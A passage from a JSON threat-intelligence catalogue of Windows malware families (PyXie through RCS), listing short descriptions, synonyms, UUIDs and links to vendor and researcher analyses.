"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://threatvector.cylance.com/en_us/home/meet-pyxie-a-nefarious-new-python-rat.html", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", "https://www.secureworks.com/research/threat-profiles/gold-dupont", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/" ], "synonyms": [ "PyXie RAT" ], "type": [] }, "uuid": "41217f01-2b03-41c1-88fc-cda1eee65f75", "value": "PyXie" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qaccel" ], "synonyms": [], "type": [] }, "uuid": "f4980a75-f72c-4925-8ff5-118b32dd5eaa", "value": "Qaccel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars", "https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan", "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/", "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/", "https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/", "https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/" ], "synonyms": [], "type": [] }, "uuid": "080b2071-2d69-4b76-962e-3d0142074bcb", "value": "Qadars" }, { "description": "QBot is a modular information stealer also known as Qakbot or Pinkslipbot. It has been active for years since 2007. It has historically been known as a banking Trojan, meaning that it steals financial data from infected systems, and a loader using C2 servers for payload targeting and download. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot", "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf", "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", "https://blog.quosec.net/posts/grap_qakbot_navigation/", "https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/", "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", "https://blog.morphisec.com/qakbot-qbot-maldoc-two-new-techniques", "https://research.checkpoint.com/2020/exploring-qbots-latest-attack-methods/", "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-1/", "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf", "https://twitter.com/redcanary/status/1334224861628039169", "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/", "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf", "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html", "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", "https://n1ght-w0lf.github.io/malware%20analysis/qbot-banking-trojan/", "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.group-ib.com/blog/egregor", "https://www.intrinsec.com/egregor-prolock/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://malwareandstuff.com/upnp-messing-up-security-since-years/", "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/", "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/", "https://blog.talosintelligence.com/2016/04/qbot-on-the-rise.html", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/", "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", "https://hatching.io/blog/reversing-qakbot", "https://www.secureworks.com/research/threat-profiles/gold-lagoon", "https://blog.talosintelligence.com/2019/05/qakbot-levels-up-with-new-obfuscation.html", "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", "https://www.youtube.com/watch?v=iB1psRMtlqg", "https://blog.quosec.net/posts/grap_qakbot_strings/", "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf", "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", "https://twitter.com/TheDFIRReport/status/1361331598344478727", "https://0xthreatintel.medium.com/reversing-qakbot-tlp-white-d1b8b37ad8e7", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf", "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-analyzing-a-fowl-banking-trojan-part-1/", "https://content.fireeye.com/m-trends/rpt-m-trends-2020", "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex", "http://contagiodump.blogspot.com/2010/11/template.html", "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-countermeasures/", "https://www.group-ib.com/blog/prolock_evolution", "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/", "https://www.f5.com/labs/articles/threat-intelligence/qbot-banking-trojan-still-up-to-its-old-tricks", "https://isc.sans.edu/diary/rss/26862" ], "synonyms": [ "Pinkslipbot", "Qbot", "Quakbot" ], "type": [] }, "uuid": "2ccaccd0-8362-4224-8497-2012e7cc7549", "value": "QakBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost" ], "synonyms": [ "Tolouge" ], "type": [] }, "uuid": "28f35535-dd40-4ee2-8064-5acbe76d8d4c", "value": "QHost" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qtbot", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/" ], "synonyms": [ "qtproject" ], "type": [] }, "uuid": "e8240391-3e3d-4894-ba80-f8e8de8a8222", "value": "QtBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.quantloader", "https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/", "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat" ], "synonyms": [], "type": [] }, "uuid": "e6005ce5-3e3d-4dfb-8de7-3da45e89e549", "value": "QuantLoader" }, { "description": "Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat", "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign", "https://blog.morphisec.com/cinarat-resurfaces-with-new-evasive-tactics-and-techniques", "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", "https://twitter.com/malwrhunterteam/status/789153556255342596", "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf", "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://twitter.com/struppigel/status/1130455143504318466", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848", "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", "https://blog.malwarelab.pl/posts/venom/", "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", "https://blog.ensilo.com/uncovering-new-activity-by-apt10", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage", "https://blog.reversinglabs.com/blog/rats-in-the-library", "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://www.zscaler.com/blogs/research/shellreset-rat-spread-through-macro-based-documents-using-applocker-bypass", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html", "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", "https://www.secureworks.com/research/threat-profiles/bronze-riverside", "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/", "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite", "https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/", "https://www.antiy.cn/research/notice&report/research_report/20201228.html", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments", "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" ], "synonyms": [ "CinaRAT", "QuasarRAT", "Yggdrasil" ], "type": [] }, "uuid": "05252643-093b-4070-b62f-d5836683a9fa", "value": "Quasar RAT" }, { "description": "Qulab is an AutoIT Malware focusing on stealing & clipping content from victim's machines.\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qulab", "https://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/" ], "synonyms": [], "type": [] }, "uuid": "728ce877-6f1d-4719-81df-387a8e395695", "value": "Qulab" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.r980", "https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/" ], "synonyms": [], "type": [] }, "uuid": "06f63e6b-d177-4e21-b432-e3a219bc0965", "value": "r980" }, { "description": "Raccoon is a stealer and collects \"passwords, cookies and autofill from all popular browsers (including FireFox x64), CC data, system information, almost all existing desktop wallets of cryptocurrencies\".", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon", "https://www.cybereason.com/blog/hunting-raccoon-stealer-the-new-masked-bandit-on-the-block", "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d", "https://www.youtube.com/watch?v=1dbepxN2YD8", "https://www.group-ib.com/blog/fakesecurity_raccoon", "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", "https://www.youtube.com/watch?v=5KHZSmBeMps", "https://www.secfreaks.gr/2019/12/in-depth-analysis-of-an-infostealer-raccoon.html", "https://www.riskiq.com/blog/labs/magecart-medialand/", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/", "https://webcache.googleusercontent.com/search?q=cache:AvJw47-V_WwJ:https://ultrahacks.org/shop/product/raccoon-stealer-onion-panel/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-d", "https://lp.cyberark.com/rs/316-CZP-275/images/CyberArk-Labs-Racoon-Malware-wp.pdf", "https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf" ], "synonyms": [ "Mohazo", "RaccoonStealer", "Racealer", "Racoon" ], "type": [] }, "uuid": "027fb7d0-3e9b-4433-aee1-c266e165a5cc", "value": "Raccoon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant" ], "synonyms": [], "type": [] }, "uuid": "98bcb2b9-bc3a-4ffb-859a-94bd03c1cc3c", "value": "Radamant" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.radrat", "https://labs.bitdefender.com/2018/04/radrat-an-all-in-one-toolkit-for-complex-espionage-ops/" ], "synonyms": [], "type": [] }, "uuid": "271752e3-67ca-48bc-ade2-30eec11defca", "value": "RadRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarlocker", "https://krebsonsecurity.com/2020/11/ransomware-group-turns-to-facebook-ads/", "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/", "https://www.bleepingcomputer.com/news/security/capcom-hit-by-ragnar-locker-ransomware-1tb-allegedly-stolen/", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://www.zdnet.com/article/capcom-quietly-discloses-cyberattack-impacting-email-file-servers/", "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "https://news.sophos.com/en-us/2021/02/03/mtr-casebook-uncovering-a-backdoor-implant-in-a-solarwinds-orion-server/", "https://blog.blazeinfosec.com/dissecting-ragnar-locker-the-case-of-edp/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", "https://www.bleepingcomputer.com/news/security/ragnarlocker-ransomware-hits-edp-energy-giant-asks-for-10m/", "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", "https://www.waterisac.org/system/files/articles/FLASH-MU-000140-MW.pdf", "https://www.bleepingcomputer.com/news/security/japanese-game-dev-capcom-hit-by-cyberattack-business-impacted/", "https://id-ransomware.blogspot.com/2020/02/ragnarlocker-ransomware.html", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", "https://securelist.com/targeted-ransomware-encrypting-data/99255/", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ragnarlocker-ransomware-threatens-to-release-confidential-information" ], "synonyms": [], "type": [] }, "uuid": "33f55172-873b-409e-a09b-97ac1301b036", "value": "RagnarLocker" }, { "description": "According to Bleeping Computer, the ransomware is used in targeted attacks against unpatched Citrix servers. It excludes Russian and Chinese targets using the system's Language ID for filtering. It also tries to disable Windows Defender and has a number of UNIX filepath references in its strings. Encryption method is AES using a dynamically generated key, then bundling this key up via RSA.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarok", "https://github.com/k-vitali/Malware-Misc-RE/blob/master/2020-01-26-ragnarok-cfg-vk.notes.raw", "https://www.bleepingcomputer.com/news/security/ragnarok-ransomware-targets-citrix-adc-disables-windows-defender/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://news.sophos.com/en-us/2020/05/21/asnarok2/" ], "synonyms": [], "type": [] }, "uuid": "ce9dffb7-2220-4e9c-9cb1-221195ba42ba", "value": "Ragnarok" }, { "description": "Raindrop is a loader for Cobalt Strike that was observed in the SolarWinds attack.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.raindrop", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware" ], "synonyms": [], "type": [] }, "uuid": "309f9be7-8824-4452-90b3-cef81fd10099", "value": "Raindrop" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rakhni", "https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/" ], "synonyms": [], "type": [] }, "uuid": "cf6887d9-3d68-4f89-9d61-e97dcc4d8c20", "value": "Rakhni" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo", "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", "https://securitykitten.github.io/2017/02/15/the-rambo-backdoor.html", "https://github.com/m0n0ph1/APT_CyberCriminal_Campagin_Collections-1/blob/master/2017/2017.02.15.deep-dive-dragonok-rambo-backdoor/Deep%20Dive%20on%20the%20DragonOK%20Rambo%20Backdoor%20_%20Morphick%20Cyber%20Security.pdf" ], "synonyms": [ "brebsd" ], "type": [] }, "uuid": "805b99d1-233d-4f7f-b343-440e5d507494", "value": "Rambo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramdo" ], "synonyms": [], "type": [] }, "uuid": "51f53823-d289-4176-af45-3fca7eda824b", "value": "Ramdo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit", "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html", "https://blogs.akamai.com/2019/02/ramnit-in-the-uk.html", "http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/", "https://www.youtube.com/watch?v=N4f2e8Mygag", "https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/", "https://redcanary.com/resources/webinars/deep-dive-process-injection/", "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", "https://research.checkpoint.com/ramnits-network-proxy-servers/", "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html", "https://www.youtube.com/watch?v=l6ZunH6YG0A", "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf" ], "synonyms": [ "Nimnul" ], "type": [] }, "uuid": "542161c0-47a4-4297-baca-5ed98386d228", "value": "Ramnit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramsay", "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/", "https://www.antiy.cn/research/notice&report/research_report/20200522.html", "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html", "https://www.youtube.com/watch?v=SKIu4LqMrns", "https://www.sentinelone.com/blog/why-on-device-detection-matters-new-ramsay-trojan-targets-air-gapped-networks/" ], "synonyms": [], "type": [] }, "uuid": "3b5bb37b-c5be-45b6-a4b1-83a03605a926", "value": "Ramsay" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus", "https://www.group-ib.ru/brochures/Group-IB-Corkow-Report-EN.pdf", "https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/", "https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/", "http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html", "https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/" ], "synonyms": [], "type": [] }, "uuid": "5d9a27e7-3110-470a-ac0d-2bf00cac7846", "value": "Ranbyus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranscam", "http://blog.talosintel.com/2016/07/ranscam.html" ], "synonyms": [], "type": [] }, "uuid": "50c92b0b-cae3-41e7-b7d8-dffc2c88ac4b", "value": "Ranscam" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransoc", "https://www.proofpoint.com/us/threat-insight/post/ransoc-desktop-locking-ransomware-ransacks-local-files-social-media-profiles" ], "synonyms": [], "type": [] }, "uuid": "5310903e-0704-4ca4-ab1b-52d243dddb06", "value": "Ransoc" }, { "description": "RansomExx is a ransomware family that targeted multiple companies starting in mid-2020. It shares commonalities with Defray777.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx", "https://www.trendmicro.com/en_us/research/21/a/expanding-range-and-improving-speed-a-ransomexx-approach.html", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3", "https://www.bleepingcomputer.com/news/security/new-ransom-x-ransomware-used-in-texas-txdot-cyberattack/", "https://id-ransomware.blogspot.com/2020/06/ransomexx-ransomware.html", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", "https://www.bleepingcomputer.com/news/security/brazils-court-system-under-massive-ransomexx-ransomware-attack/", "https://github.com/Bleeping/Ransom.exx", "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/" ], "synonyms": [ "Defray777", "Ransom X" ], "type": [] }, "uuid": "ddb31693-2356-4345-9c0f-ab37724090a4", "value": "RansomEXX (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomlock", "https://forum.malekal.com/viewtopic.php?t=36485&start=", "https://www.symantec.com/security_response/writeup.jsp?docid=2012-022215-2340-99&tabid=2" ], "synonyms": [ "WinLock" ], "type": [] }, "uuid": "3e47c926-eea3-4fba-915a-1f3c5b92a94c", "value": "Ransomlock" }, { "description": "Ransomware SNC is a ransomware who encrypts files and asks for a variable amount of Bitcoin before releasing the decryption key to your files. The threat actor asks to be contacted for negotiating the right ransom fee.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomware_snc", "https://yomi.yoroi.company/report/5deea91bac2ea1dcf5337ad8/5deead588a4518a7074dc6e6/overview" ], "synonyms": [], "type": [] }, "uuid": "0e9c2936-7167-48fb-9dee-a83f83d8e41e", "value": "Ransomware SNC" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom", "https://twitter.com/malwrhunterteam/status/997748495888076800", "https://www.youtube.com/watch?v=LUxOcpIRxmg", "https://twitter.com/malwrhunterteam/status/977275481765613569", "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", "https://exchange.xforce.ibmcloud.com/collection/GuessWho-Ransomware-A-Variant-of-Rapid-Ransomware-ef226b9792fa4c1e34fa4c587db04145" ], "synonyms": [], "type": [] }, "uuid": "06929ad3-2a00-4212-b171-9ecb5f956af5", "value": "Rapid Ransom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_stealer", "http://pwc.blogs.com/cyber_security_updates/2014/09/malware-microevolution.html" ], "synonyms": [], "type": [] }, "uuid": "bc1fc21d-80c0-4629-bb18-d5ae1df2a431", "value": "RapidStealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarog", "https://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/", "https://tracker.fumik0.com/malware/Rarog" ], "synonyms": [], "type": [] }, "uuid": "184e5134-473c-4a01-9a8b-f4776f178fc9", "value": "Rarog" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" ], "synonyms": [], "type": [] }, "uuid": "e0a1407f-2595-4bd2-ba16-2c6d9be4e066", "value": "rarstar" }, { "description": "This is a backdoor that establishes persistence using the Startup folder. \r\nIt communicates to its C&C server using HTTPS and a static HTTP User-Agent \r\nstring. QUICKRIDE is capable of gathering information about the system, \r\ndownloading and loading executables, and uninstalling itself. It was leveraged \r\nagainst banks in Poland.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankba", "https://content.fireeye.com/apt/rpt-apt38", "https://www.secureworks.com/research/threat-profiles/nickel-gladstone", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html", "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware-0", "https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html", "https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/", "https://twitter.com/PhysicalDrive0/status/828915536268492800", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware" ], "synonyms": [ "QUICKRIDE" ], "type": [] }, "uuid": "eead20f5-6a30-4700-8d14-cfb2d42eaff0", "value": "Ratankba" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankbapos", "http://blog.trex.re.kr/3", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" ], "synonyms": [ "RATANKBAPOS" ], "type": [] }, "uuid": "15b85bac-c58b-41fd-8332-cfac7c445e0d", "value": "RatankbaPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratsnif", "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", "https://threatvector.cylance.com/en_us/home/threat-spotlight-ratsnif-new-network-vermin-from-oceanlotus.html" ], "synonyms": [], "type": [] }, "uuid": "2f700b52-4379-4b53-894b-1823e34ae71d", "value": "RatSnif" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos", "https://www.youtube.com/watch?v=fevGZs0EQu8", "https://threatvector.cylance.com/en_us/home/rawpos-malware.html", "http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite" ], "synonyms": [], "type": [] }, "uuid": "80f87001-ff40-4e33-bd12-12ed1a92d1d7", "value": "RawPOS" }, { "description": "A family identified by ESET Research in the InvisiMole campaign.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rc2fm", "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf" ], "synonyms": [], "type": [] }, "uuid": "165f385f-8507-4cd3-9afd-911a016b2d29", "value": "RC2FM" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs", "https://www.f-secure.com/documents/996508/1030745/callisto-group", "https://www.vice.com/en_us/article/jgxvdx/jan-marsalek-wirecard-bizarre-attempt-to-buy-hacking-team-spyware", "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines", "http://blogs.360.cn/post/APT-C-34_Golden_Falcon.html", "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", 